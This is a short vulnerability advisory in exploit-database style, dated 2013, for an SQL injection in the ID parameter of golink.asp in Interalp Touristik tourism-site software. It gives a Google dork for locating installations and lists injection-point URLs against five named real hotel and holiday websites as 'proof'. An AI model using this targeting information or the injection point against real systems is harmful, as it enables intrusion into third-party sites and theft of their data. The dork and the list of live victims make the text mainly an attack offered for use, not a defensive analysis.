#******************************************************************************** # Exploit Title : Interalp Touristik Sql injection Vulnerabilites # # Exploit Author : Ashiyane Digital Security Team # # Software Link : http://interalp-touristik.com # # Tested on: Windows 7 , Linux # # Google Dork : intext:"powered by Interalp Touristik" # # Date: 2013/09/10 # -------------------------------------------------------------------- # Exploit : Sql Injection # # Location : [Target]/de/golink.asp?DB=Contentanhang&ID=[Sql Injection] # # # Proof: # # http://www.der-adler.at/de/golink.asp?DB=Contentanhang&ID=1' # # http://www.holzgau-wel.com/de/golink.asp?DB=Contentanhang&ID=1' # # http://www.lifebox.at/de/golink.asp?DB=Contentanhang&ID=1' # # http://www.machurlaub.at/de/golink.asp?DB=Contentanhang&ID=1' # # http://www.hotel-regina.it/de/golink.asp?DB=Contentanhang&ID=1' -------------------------------------------------------------------- ###################### discovered by : ACC3SS ######################